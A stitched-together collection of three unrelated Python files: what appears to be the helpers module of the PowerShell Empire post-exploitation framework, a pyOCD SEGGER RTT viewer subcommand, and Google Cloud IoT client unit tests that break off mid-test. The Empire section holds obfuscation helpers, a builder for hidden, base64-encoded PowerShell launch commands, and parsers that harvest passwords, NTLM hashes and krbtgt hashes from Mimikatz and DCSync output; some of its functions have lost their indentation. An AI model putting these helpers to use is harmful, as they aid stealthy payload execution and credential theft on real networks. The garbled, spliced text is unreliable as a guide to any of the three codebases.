    # below.  NOTE(review): every fragment comes from iptools-validated
    # input, but building code via eval is fragile — consider constructing
    # the argument tuple directly instead.
    ranges = ""
    if s and s != "":
        parts = s.split(",")
        for part in parts:
            p = part.split("-")
            if len(p) == 2:
                # explicit "start-end" range: both ends must validate
                if iptools.ipv4.validate_ip(p[0]) and iptools.ipv4.validate_ip(p[1]):
                    ranges += "('"+str(p[0])+"', '"+str(p[1])+"'),"
            else:
                # single address or CIDR block (p[0] == part when no dash)
                if "/" in part and iptools.ipv4.validate_cidr(part):
                    ranges += "'"+str(p[0])+"',"
                elif iptools.ipv4.validate_ip(part):
                    ranges += "'"+str(p[0])+"',"
        if ranges != "":
            return eval("iptools.IpRangeList("+ranges+")")
        else:
            return None
    else:
        return None
####################################################################################
#
# Randomizers/obfuscators
#
####################################################################################
def random_string(length=-1, charset=string.ascii_letters):
    """
    Build a random string drawn from *charset*.

    When *length* is -1 (the default) a size between 6 and 15
    characters is picked at random.  The default character set is
    upper- and lower-case ASCII letters.
    """
    size = random.randrange(6, 16) if length == -1 else length
    return "".join(random.choice(charset) for _ in range(size))
def obfuscate_num(N, mod):
    """
    Take a number and modulus and return an obfuscated form.

    Picks a random divisor d in [1, mod] and returns the string
    "(quotient*d+remainder)", which evaluates back to N.
    """
    divisor = random.randint(1, mod)
    quotient = int(N / divisor)
    remainder = N % divisor
    return "(%s*%s+%s)" % (quotient, divisor, remainder)
def randomize_capitalization(data):
    """
    Return *data* with each character randomly upper-cased or left as-is.
    """
    out = []
    for ch in data:
        out.append(random.choice([ch.upper(), ch]))
    return "".join(out)
def chunks(l, n):
    """
    Generator to split a sequence l into chunks of size n.

    The final chunk may be shorter than n.
    """
    # range() rather than xrange() so this works on both Python 2 and 3;
    # iteration values (and the ValueError on n == 0) are identical
    for i in range(0, len(l), n):
        yield l[i:i+n]
####################################################################################
#
# Specific PowerShell helpers
#
####################################################################################
def enc_powershell(raw):
    """
    Encode a PowerShell command into a form usable by powershell.exe -enc ...

    Interleaves a NUL after every character (UTF-16-LE style) before
    base64 encoding.
    """
    widened = "".join(char + "\x00" for char in unicode(raw))
    return base64.b64encode(widened)
def powershell_launcher_arch(raw):
    """
    Build a one line PowerShell launcher with an -enc command.
    Architecture independent.
    """
    # encode the payload into the -enc form
    encoded = enc_powershell(raw)
    # pick the correct PowerShell path for the architecture and stash it in %pspath%
    arch_check = "if %PROCESSOR_ARCHITECTURE%==x86 (set pspath='') else (set pspath=%WinDir%\\syswow64\\windowspowershell\\v1.0\\)&"
    # invoke PowerShell with the appropriate options
    invocation = "call %pspath%powershell.exe -NoP -NonI -W Hidden -Enc " + encoded
    return arch_check + invocation
def powershell_launcher(raw):
    """
    Build a one line PowerShell launcher carrying *raw* as an -enc payload.
    """
    return "powershell.exe -NoP -NonI -W Hidden -Enc " + enc_powershell(raw)
def parse_powershell_script(data):
    """
    Parse a raw PowerShell file and return the declared function names.
    """
    pattern = re.compile("function(.*){")
    names = []
    for hit in pattern.findall(data):
        names.append(hit.strip())
    return names
def strip_powershell_comments(data):
    """
    Strip block comments, line comments, and empty lines from a
    PowerShell file.
    """
    # drop <# ... #> block comments, which may span multiple lines
    code = re.sub(re.compile('<#.*?#>', re.DOTALL), '', data)
    # keep only non-blank lines that aren't line comments
    kept = []
    for line in code.split('\n'):
        stripped = line.strip()
        if stripped != '' and not stripped.startswith("#"):
            kept.append(line)
    return "\n".join(kept)
###############################################################
#
# Parsers
#
###############################################################
def parse_credentials(data):
"""
Parse module output, looking for any parseable sections.
"""
parts = data.split("\n")
# tag for Invoke-Mimikatz output
if parts[0].startswith("Hostname:"):
return parse_mimikatz(data)
# collection/prompt output
elif parts[0].startswith("[+] Prompted credentials:"):
parts = parts[0].split("->")
if len(parts) == 2:
username = parts[1].split(":",1)[0].strip()
password = parts[1].split(":",1)[1].strip()
if "\\" in username:
domain = username.split("\\")[0].strip()
username = username.split("\\")[1].strip()
else:
domain = ""
return [("plaintext", domain, username, password, "", "")]
else:
print helpers.color("[!] Error in parsing prompted credential output.")
return None
else:
return None
def parse_mimikatz(data):
    """
    Parse the output from Invoke-Mimikatz to return credential sets.

    Returns a uniquified list of tuples of the form:
        (credType, domain, username, password, hostname, sid)
    where credType is "hash" or "plaintext".
    """
    # cred format:
    #   credType, domain, username, password, hostname, sid
    creds = []
    # regexes for "sekurlsa::logonpasswords" Mimikatz output -- each one
    # captures the section between two provider headers (msv, tspkg, ...)
    regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)", "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)", "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]
    hostDomain = ""
    domainSid = ""
    hostName = ""
    lines = data.split("\n")
    # the first two lines carry "Hostname: host.domain / S-1-5-..." metadata
    for line in lines[0:2]:
        if line.startswith("Hostname:"):
            try:
                domain = line.split(":")[1].strip()
                temp = domain.split("/")[0].strip()
                domainSid = domain.split("/")[1].strip()
                hostName = temp.split(".")[0]
                hostDomain = ".".join(temp.split(".")[1:])
            except:
                # metadata line malformed -- fall back to empty host/domain
                pass
    # pull Username/Domain/NTLM-or-Password triples out of each provider section
    for regex in regexes:
        p = re.compile(regex)
        for match in p.findall(data):
            lines2 = match.split("\n")
            username, domain, password = "", "", ""
            for line in lines2:
                try:
                    if "Username" in line:
                        username = line.split(":",1)[1].strip()
                    elif "Domain" in line:
                        domain = line.split(":",1)[1].strip()
                    elif "NTLM" in line or "Password" in line:
                        password = line.split(":",1)[1].strip()
                except:
                    pass
            if username != "" and password != "" and password != "(null)":
                sid = ""
                # substitute the FQDN in if it matches
                if hostDomain.startswith(domain.lower()):
                    domain = hostDomain
                    sid = domainSid
                # 32 hex chars -> NTLM hash, anything else -> plaintext
                if validate_ntlm(password):
                    credType = "hash"
                else:
                    credType = "plaintext"
                # ignore machine account plaintexts
                if not (credType == "plaintext" and username.endswith("$")):
                    creds.append((credType, domain, username, password, hostName, sid))
    if len(creds) == 0:
        # check if we have lsadump output to check for krbtgt
        # happens on domain controller hashdumps
        # NOTE(review): assumes the "Domain :" line sits on lines 8-12;
        # shorter output would raise IndexError here -- TODO confirm
        for x in xrange(8,13):
            if lines[x].startswith("Domain :"):
                domain, sid, krbtgtHash = "", "", ""
                try:
                    domainParts = lines[x].split(":")[1]
                    domain = domainParts.split("/")[0].strip()
                    sid = domainParts.split("/")[1].strip()
                    # substitute the FQDN in if it matches
                    if hostDomain.startswith(domain.lower()):
                        domain = hostDomain
                        sid = domainSid
                    # the krbtgt NTLM hash sits two lines below its "User :" line
                    for x in xrange(0, len(lines)):
                        if lines[x].startswith("User : krbtgt"):
                            krbtgtHash = lines[x+2].split(":")[1].strip()
                            break
                    if krbtgtHash != "":
                        creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
                except Exception as e:
                    pass
    if len(creds) == 0:
        # check if we get lsadump::dcsync output
        if '** SAM ACCOUNT **' in lines:
            domain, user, userHash, dcName, sid = "", "", "", "", ""
            for line in lines:
                try:
                    if line.strip().endswith("will be the domain"):
                        domain = line.split("'")[1]
                    elif line.strip().endswith("will be the DC server"):
                        dcName = line.split("'")[1].split(".")[0]
                    elif line.strip().startswith("SAM Username"):
                        user = line.split(":")[1].strip()
                    elif line.strip().startswith("Object Security ID"):
                        # drop the trailing RID to get the domain SID
                        parts = line.split(":")[1].strip().split("-")
                        sid = "-".join(parts[0:-1])
                    elif line.strip().startswith("Hash NTLM:"):
                        userHash = line.split(":")[1].strip()
                except:
                    pass
            if domain != "" and userHash != "":
                creds.append(("hash", domain, user, userHash, dcName, sid))
    # de-duplicate on (credType, domain, username, password)
    return uniquify_tuples(creds)
###############################################################
#
# Miscellaneous methods (formatting, sorting, etc.)
#
###############################################################
def get_config(fields):
    """
    Helper to pull common database config information outside of the
    normal menu execution.

    Fields should be comma separated, i.e. 'version,install_path'.
    Returns the first matching row tuple from the config table.
    """
    conn = sqlite3.connect('./data/empire.db', check_same_thread=False)
    try:
        conn.isolation_level = None
        cur = conn.cursor()
        # NOTE: fields is interpolated into the SQL -- callers must only
        # pass trusted, hard-coded column names
        cur.execute("SELECT "+fields+" FROM config")
        results = cur.fetchone()
        cur.close()
        return results
    finally:
        # always release the handle, even if the query raises
        conn.close()
def get_datetime():
    """
    Return the current local date/time as 'YYYY-MM-DD HH:MM:SS'.
    """
    now = localtime()
    return strftime("%Y-%m-%d %H:%M:%S", now)
def get_file_datetime():
    """
    Return the current local date/time in a format workable for a
    file name ('YYYY-MM-DD_HH-MM-SS').
    """
    file_stamp = strftime("%Y-%m-%d_%H-%M-%S", localtime())
    return file_stamp
def lhost():
    """
    Return the local IP.

    First tries a hostname lookup; if that yields nothing usable (empty
    or loopback) on a non-Windows host, probes a list of common
    interface names via SIOCGIFADDR.
    """
    if os.name != "nt":
        # fcntl/struct only exist on POSIX -- import lazily so the
        # module still loads on Windows
        import fcntl
        import struct
        def get_interface_ip(ifname):
            # query the kernel for the interface's IPv4 address
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                return socket.inet_ntoa(fcntl.ioctl(
                    s.fileno(),
                    0x8915,  # SIOCGIFADDR
                    struct.pack('256s', ifname[:15])
                )[20:24])
            except IOError as e:
                # interface missing or has no address
                return ""
    ip = ""
    try:
        ip = socket.gethostbyname(socket.gethostname())
    except socket.gaierror:
        pass
    except:
        print "Unexpected error:", sys.exc_info()[0]
        return ip
    # hostname lookup gave loopback/nothing -- walk likely interfaces
    if (ip == "" or ip.startswith("127.")) and os.name != "nt":
        interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"]
        for ifname in interfaces:
            try:
                ip = get_interface_ip(ifname)
                if ip != "":
                    break
            except:
                print "Unexpected error:", sys.exc_info()[0]
                pass
    return ip
def color(string, color=None):
    """
    Wrap *string* in ANSI escape codes for the Linux terminal.

    An explicit color of red/green/blue wins; otherwise the color is
    inferred from a leading [!] (red), [+] (green) or [*] (blue) tag.
    Unrecognized explicit colors still get bold; untagged strings are
    returned unchanged. Output is always bold when wrapped.
    """
    codes = {"red": "31", "green": "32", "blue": "34"}
    prefixes = {"[!]": "31", "[+]": "32", "[*]": "34"}
    attr = ["1"]  # bold, always
    if color:
        code = codes.get(color.lower())
        if code:
            attr.append(code)
        return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
    for tag, code in prefixes.items():
        if string.startswith(tag):
            attr.append(code)
            return '\x1b[%sm%s\x1b[0m' % (';'.join(attr), string)
    return string
def unique(seq, idfun=None):
    """
    Return *seq* with duplicates removed, preserving order.

    idfun, if given, maps each item to the key used for duplicate
    detection. (From http://www.peterbe.com/plog/uniqifiers-benchmark.)
    """
    if idfun is None:
        idfun = lambda x: x
    seen = {}
    result = []
    for item in seq:
        marker = idfun(item)
        if marker not in seen:
            seen[marker] = 1
            result.append(item)
    return result
def uniquify_tuples(tuples):
    """
    Uniquify mimikatz credential tuples, preserving order.

    cred format- (credType, domain, username, password, hostname, sid);
    two creds are duplicates when their first four fields match.
    """
    seen = set()
    result = []
    for item in tuples:
        key = "%s%s%s%s" % (item[0], item[1], item[2], item[3])
        if key not in seen:
            seen.add(key)
            result.append(item)
    return result
def urldecode(url):
    """
    URL decode %xx escapes in a string.
    """
    # hex digits only: the previous class [0-9a-hA-H] also matched g/h,
    # which are not valid hex and would break the int(x, 16) conversion
    # performed by the htc() substitution callback
    rex = re.compile(r'%([0-9a-fA-F][0-9a-fA-F])', re.M)
    return rex.sub(htc, url)
def decode_base64(data):
    """
    Try to decode a base64 string, tolerating missing '=' padding.

    Returns the decoded data, or the original input unchanged if it
    doesn't decode.
    From http://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding
    """
    # only pad when padding is actually missing; the previous
    # "4 - len(data) % 4" appended four bogus '=' to already-aligned input
    remainder = len(data) % 4
    if remainder:
        data += b'=' * (4 - remainder)
    try:
        result = base64.decodestring(data)
        return result
    except binascii.Error:
        # if there's a decoding error, just return the data
        return data
def encode_base64(data):
    """
    Encode data as a base64 string, without the trailing newline.
    """
    encoded = base64.encodestring(data)
    return encoded.strip()
def complete_path(text, line, arg=False):
    """
    Helper for tab-completion of file paths.

    Splits the command line to find the path fragment being completed and
    returns the matching directory entries (directories get a trailing '/').
    Adapted from dataq at
    http://stackoverflow.com/questions/16826172/filename-tab-completion-in-cmd-cmd-of-python
    """
    # "command something path" vs "command path"
    pieces = line.split()[1:] if arg else line.split()[0:]
    if not pieces or len(pieces) == 1:
        # nothing typed yet -- offer the current directory
        return os.listdir('./')
    folder, sep, base = pieces[-1].rpartition('/')
    if sep == '':
        # bare name, complete relative to the current directory
        folder = './'
    elif folder == '':
        # path like "/usr" -- complete from the filesystem root
        folder = '/'
    completions = []
    for entry in os.listdir(folder):
        if entry.startswith(base):
            suffix = '' if os.path.isfile(os.path.join(folder, entry)) else '/'
            completions.append(entry + suffix)
    return completions
| |
# pyOCD debugger
# Copyright (c) 2021 mikisama
# Copyright (C) 2021 Ciro Cattuto <ciro.cattuto@gmail.com>
# Copyright (C) 2021 Simon D. Levy <simon.d.levy@gmail.com>
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from typing import List
import logging
from pyocd.core.helpers import ConnectHelper
from pyocd.core.memory_map import MemoryMap, MemoryRegion, MemoryType
from pyocd.core.soc_target import SoCTarget
from pyocd.subcommands.base import SubcommandBase
from pyocd.utility.cmdline import convert_session_options, int_base_0
from pyocd.utility.kbhit import KBHit
from ctypes import Structure, c_char, c_int32, c_uint32, sizeof
LOG = logging.getLogger(__name__)
class SEGGER_RTT_BUFFER_UP(Structure):
    """@brief `SEGGER RTT Ring Buffer` target to host.

    Field layout must match the firmware's struct exactly (32-bit
    target words); do not reorder or resize fields.
    """
    _fields_ = [
        ("sName", c_uint32),         # target-side pointer to the channel name string
        ("pBuffer", c_uint32),       # target-side pointer to the ring buffer storage
        ("SizeOfBuffer", c_uint32),  # ring buffer capacity in bytes
        ("WrOff", c_uint32),         # write offset, advanced by the target
        ("RdOff", c_uint32),         # read offset, advanced by the host (us)
        ("Flags", c_uint32),         # RTT mode flags; not interpreted by this tool
    ]
class SEGGER_RTT_BUFFER_DOWN(Structure):
    """@brief `SEGGER RTT Ring Buffer` host to target.

    Same layout as the up buffer; only the direction (and thus which
    side advances which offset) differs.
    """
    _fields_ = [
        ("sName", c_uint32),         # target-side pointer to the channel name string
        ("pBuffer", c_uint32),       # target-side pointer to the ring buffer storage
        ("SizeOfBuffer", c_uint32),  # ring buffer capacity in bytes
        ("WrOff", c_uint32),         # write offset, advanced by the host (us)
        ("RdOff", c_uint32),         # read offset, advanced by the target
        ("Flags", c_uint32),         # RTT mode flags; not interpreted by this tool
    ]
class SEGGER_RTT_CB(Structure):
    """@brief `SEGGER RTT control block` structure.

    Located in target RAM by scanning for the "SEGGER RTT" acID tag.
    NOTE(review): the fixed *3 array sizes assume the firmware's default
    buffer counts; only aUp.offset and the actual MaxNum* values read
    from the target are used for address math -- confirm if a target
    uses larger counts.
    """
    _fields_ = [
        ("acID", c_char * 16),                 # identifier tag, "SEGGER RTT"
        ("MaxNumUpBuffers", c_int32),          # number of up (target->host) buffers
        ("MaxNumDownBuffers", c_int32),        # number of down (host->target) buffers
        ("aUp", SEGGER_RTT_BUFFER_UP * 3),     # up buffer descriptors
        ("aDown", SEGGER_RTT_BUFFER_DOWN * 3), # down buffer descriptors
    ]
class RTTSubcommand(SubcommandBase):
    """@brief `pyocd rtt` subcommand.

    Connects to a target, locates the SEGGER RTT control block in RAM,
    then bridges RTT channel 0 to the local terminal: target output is
    printed to stdout and keyboard input is sent down to the target
    (ESC exits).
    """

    NAMES = ["rtt"]
    HELP = "SEGGER RTT Viewer."

    @classmethod
    def get_args(cls) -> List[argparse.ArgumentParser]:
        """@brief Add this subcommand to the subparsers object."""
        rtt_parser = argparse.ArgumentParser(cls.HELP, add_help=False)

        rtt_options = rtt_parser.add_argument_group("rtt options")
        rtt_options.add_argument("-a", "--address", type=int_base_0, default=None,
                                 help="Start address of RTT control block search range.")
        rtt_options.add_argument("-s", "--size", type=int_base_0, default=None,
                                 help="Size of RTT control block search range.")

        return [cls.CommonOptions.COMMON, cls.CommonOptions.CONNECT, rtt_parser]

    def invoke(self) -> int:
        """@brief Run the RTT viewer loop.

        @return Process exit code: 0 on clean exit, 1 on connection or
                RTT discovery failure.
        """
        session = None
        kb = None

        try:
            session = ConnectHelper.session_with_chosen_probe(
                project_dir=self._args.project_dir,
                config_file=self._args.config,
                user_script=self._args.script,
                no_config=self._args.no_config,
                pack=self._args.pack,
                unique_id=self._args.unique_id,
                target_override=self._args.target_override,
                frequency=self._args.frequency,
                blocking=(not self._args.no_wait),
                connect_mode=self._args.connect_mode,
                options=convert_session_options(self._args.options))

            if session is None:
                LOG.error("No target device available")
                return 1

            with session:
                target: SoCTarget = session.board.target

                memory_map: MemoryMap = target.get_memory_map()
                ram_region: MemoryRegion = memory_map.get_default_region_of_type(MemoryType.RAM)

                # determine the control block search window
                if self._args.address is None or self._args.size is None:
                    rtt_range_start = ram_region.start
                    rtt_range_size = ram_region.length
                elif ram_region.start <= self._args.address and self._args.size <= ram_region.length:
                    rtt_range_start = self._args.address
                    rtt_range_size = self._args.size
                else:
                    # BUGFIX: previously an out-of-range -a/-s pair assigned
                    # neither variable and crashed with UnboundLocalError below
                    LOG.error("RTT control block search range is outside the default RAM region")
                    return 1

                LOG.info(f"RTT control block search range [{rtt_range_start:#08x}, {rtt_range_size:#08x}]")

                data = target.read_memory_block8(rtt_range_start, rtt_range_size)
                pos = bytes(data).find(b"SEGGER RTT")

                if pos == -1:
                    LOG.error("No RTT control block available")
                    return 1

                rtt_cb_addr = rtt_range_start + pos
                rtt_cb = SEGGER_RTT_CB.from_buffer(bytearray(data[pos:]))
                up_addr = rtt_cb_addr + SEGGER_RTT_CB.aUp.offset
                down_addr = up_addr + sizeof(SEGGER_RTT_BUFFER_UP) * rtt_cb.MaxNumUpBuffers

                LOG.info(f"_SEGGER_RTT @ {rtt_cb_addr:#08x} with {rtt_cb.MaxNumUpBuffers} aUp and {rtt_cb.MaxNumDownBuffers} aDown")

                # some targets might need this here
                #target.reset_and_halt()

                target.resume()

                # set up terminal input
                kb = KBHit()

                # byte array accumulating keyboard input to send via RTT
                cmd = bytes()

                while True:
                    # read data from up buffers (target -> host)
                    data = target.read_memory_block8(up_addr, sizeof(SEGGER_RTT_BUFFER_UP))
                    up = SEGGER_RTT_BUFFER_UP.from_buffer(bytearray(data))

                    if up.WrOff > up.RdOff:
                        # pending data is contiguous:
                        #   |oooooo|xxxxxxxxxxxx|oooooo|
                        #   0      RdOff        WrOff  SizeOfBuffer
                        data = target.read_memory_block8(up.pBuffer + up.RdOff, up.WrOff - up.RdOff)
                        target.write_memory(up_addr + SEGGER_RTT_BUFFER_UP.RdOff.offset, up.WrOff)
                        print(bytes(data).decode(), end="", flush=True)
                    elif up.WrOff < up.RdOff:
                        # pending data wraps around the end of the ring:
                        #   |xxxxxx|oooooooooooo|xxxxxx|
                        #   0      WrOff        RdOff  SizeOfBuffer
                        data = target.read_memory_block8(up.pBuffer + up.RdOff, up.SizeOfBuffer - up.RdOff)
                        data += target.read_memory_block8(up.pBuffer, up.WrOff)
                        target.write_memory(up_addr + SEGGER_RTT_BUFFER_UP.RdOff.offset, up.WrOff)
                        print(bytes(data).decode(), end="", flush=True)
                    else:  # up buffer is empty
                        # try and fetch a keyboard character instead
                        if not kb.kbhit():
                            continue
                        c = kb.getch()
                        if ord(c) == 8 or ord(c) == 127:  # process backspace
                            print("\b \b", end="", flush=True)
                            cmd = cmd[:-1]
                            continue
                        elif ord(c) == 27:  # process ESC
                            break
                        else:
                            print(c, end="", flush=True)
                            cmd += c.encode()

                        # keep accumulating until we see CR or LF
                        if c not in "\r\n":
                            continue

                        # send the accumulated line to the target
                        data = target.read_memory_block8(down_addr, sizeof(SEGGER_RTT_BUFFER_DOWN))
                        down = SEGGER_RTT_BUFFER_DOWN.from_buffer(bytearray(data))

                        # compute free space in the down buffer
                        if down.WrOff >= down.RdOff:
                            num_avail = down.SizeOfBuffer - (down.WrOff - down.RdOff)
                        else:
                            num_avail = down.RdOff - down.WrOff - 1

                        # wait until there's space for the entire string in the RTT down buffer
                        if (num_avail < len(cmd)):
                            continue

                        # write data to down buffer (host -> target), char by char
                        for i in range(len(cmd)):
                            target.write_memory_block8(down.pBuffer + down.WrOff, cmd[i:i+1])
                            down.WrOff += 1
                            if down.WrOff == down.SizeOfBuffer:
                                down.WrOff = 0
                        target.write_memory(down_addr + SEGGER_RTT_BUFFER_DOWN.WrOff.offset, down.WrOff)

                        # clear it and start anew
                        cmd = bytes()

        except KeyboardInterrupt:
            pass

        finally:
            if session:
                session.close()
            if kb:
                kb.set_normal_term()

        return 0
| |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests."""
import pytest
from google.cloud import iot_v1
from google.cloud.iot_v1.proto import device_manager_pb2
from google.cloud.iot_v1.proto import resources_pb2
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import policy_pb2
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
class MultiCallableStub(object):
    """Stub for the grpc.UnaryUnaryMultiCallable interface.

    Records each request on the owning channel stub and replays that
    stub's canned responses, raising any response that is an Exception.
    """

    def __init__(self, method, channel_stub):
        self.method = method
        self.channel_stub = channel_stub

    def __call__(self, request, timeout=None, metadata=None, credentials=None):
        self.channel_stub.requests.append((self.method, request))

        if not self.channel_stub.responses:
            return None
        response = self.channel_stub.responses.pop()
        if isinstance(response, Exception):
            raise response
        # falsy responses (e.g. empty messages) yield None, matching the
        # original stub's behavior
        return response if response else None
class ChannelStub(object):
    """Stub for the grpc.Channel interface.

    Collects every request issued through it and hands out the canned
    *responses* in LIFO order.
    """

    def __init__(self, responses=None):
        # avoid a mutable default argument: the previous `responses=[]`
        # default was shared across every ChannelStub instance
        self.responses = responses if responses is not None else []
        self.requests = []

    def unary_unary(self,
                    method,
                    request_serializer=None,
                    response_deserializer=None):
        """Return a multi-callable stub bound to *method* on this channel."""
        return MultiCallableStub(method, self)
class CustomException(Exception):
    """Marker exception used to exercise the client's error paths."""
class TestDeviceManagerClient(object):
    """Unit tests for iot_v1.DeviceManagerClient over a stubbed gRPC channel."""

    def test_create_device_registry(self):
        """create_device_registry returns the stubbed registry and issues one RPC."""
        # Setup Expected Response
        id_ = 'id3355'
        name = 'name3373707'
        expected_response = {'id': id_, 'name': name}
        expected_response = resources_pb2.DeviceRegistry(**expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        parent = client.location_path('[PROJECT]', '[LOCATION]')
        device_registry = {}

        response = client.create_device_registry(parent, device_registry)
        assert expected_response == response

        # exactly one RPC, carrying the expected request message
        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.CreateDeviceRegistryRequest(
            parent=parent, device_registry=device_registry)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_create_device_registry_exception(self):
        """create_device_registry propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        parent = client.location_path('[PROJECT]', '[LOCATION]')
        device_registry = {}

        with pytest.raises(CustomException):
            client.create_device_registry(parent, device_registry)

    def test_get_device_registry(self):
        """get_device_registry returns the stubbed registry for a registry path."""
        # Setup Expected Response
        id_ = 'id3355'
        name_2 = 'name2-1052831874'
        expected_response = {'id': id_, 'name': name_2}
        expected_response = resources_pb2.DeviceRegistry(**expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')

        response = client.get_device_registry(name)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.GetDeviceRegistryRequest(
            name=name)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_get_device_registry_exception(self):
        """get_device_registry propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')

        with pytest.raises(CustomException):
            client.get_device_registry(name)
    def test_update_device_registry(self):
        """update_device_registry returns the stubbed registry and sends the mask."""
        # Setup Expected Response
        id_ = 'id3355'
        name = 'name3373707'
        expected_response = {'id': id_, 'name': name}
        expected_response = resources_pb2.DeviceRegistry(**expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        device_registry = {}
        update_mask = {}

        response = client.update_device_registry(device_registry, update_mask)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.UpdateDeviceRegistryRequest(
            device_registry=device_registry, update_mask=update_mask)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_update_device_registry_exception(self):
        """update_device_registry propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        device_registry = {}
        update_mask = {}

        with pytest.raises(CustomException):
            client.update_device_registry(device_registry, update_mask)

    def test_delete_device_registry(self):
        """delete_device_registry issues exactly one well-formed delete RPC."""
        channel = ChannelStub()
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')

        client.delete_device_registry(name)

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.DeleteDeviceRegistryRequest(
            name=name)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_delete_device_registry_exception(self):
        """delete_device_registry propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        name = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')

        with pytest.raises(CustomException):
            client.delete_device_registry(name)
    def test_list_device_registries(self):
        """list_device_registries pages through and yields the stubbed registries."""
        # Setup Expected Response
        next_page_token = ''
        device_registries_element = {}
        device_registries = [device_registries_element]
        expected_response = {
            'next_page_token': next_page_token,
            'device_registries': device_registries
        }
        expected_response = device_manager_pb2.ListDeviceRegistriesResponse(
            **expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        parent = client.location_path('[PROJECT]', '[LOCATION]')

        # materializing the pager triggers the underlying RPC
        paged_list_response = client.list_device_registries(parent)
        resources = list(paged_list_response)
        assert len(resources) == 1

        assert expected_response.device_registries[0] == resources[0]

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.ListDeviceRegistriesRequest(
            parent=parent)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_list_device_registries_exception(self):
        """list_device_registries surfaces errors when the pager is consumed."""
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        parent = client.location_path('[PROJECT]', '[LOCATION]')

        paged_list_response = client.list_device_registries(parent)
        with pytest.raises(CustomException):
            list(paged_list_response)

    def test_create_device(self):
        """create_device returns the stubbed device and issues one RPC."""
        # Setup Expected Response
        id_ = 'id3355'
        name = 'name3373707'
        num_id = 1034366860
        blocked = True
        expected_response = {
            'id': id_,
            'name': name,
            'num_id': num_id,
            'blocked': blocked
        }
        expected_response = resources_pb2.Device(**expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup Request
        parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
        device = {}

        response = client.create_device(parent, device)
        assert expected_response == response

        assert len(channel.requests) == 1
        expected_request = device_manager_pb2.CreateDeviceRequest(
            parent=parent, device=device)
        actual_request = channel.requests[0][1]
        assert expected_request == actual_request

    def test_create_device_exception(self):
        """create_device propagates transport-level errors."""
        # Mock the API response
        channel = ChannelStub(responses=[CustomException()])
        client = iot_v1.DeviceManagerClient(channel=channel)

        # Setup request
        parent = client.registry_path('[PROJECT]', '[LOCATION]', '[REGISTRY]')
        device = {}

        with pytest.raises(CustomException):
            client.create_device(parent, device)
    def test_get_device(self):
        """get_device returns the stubbed device for a device path."""
        # Setup Expected Response
        id_ = 'id3355'
        name_2 = 'name2-1052831874'
        num_id = 1034366860
        blocked = True
        expected_response = {
            'id': id_,
            'name': name_2,
            'num_id': num_id,
            'blocked': blocked
        }
        expected_response = resources_pb2.Device(**expected_response)

        # Mock the API response
        channel = ChannelStub(responses=[expected_response])
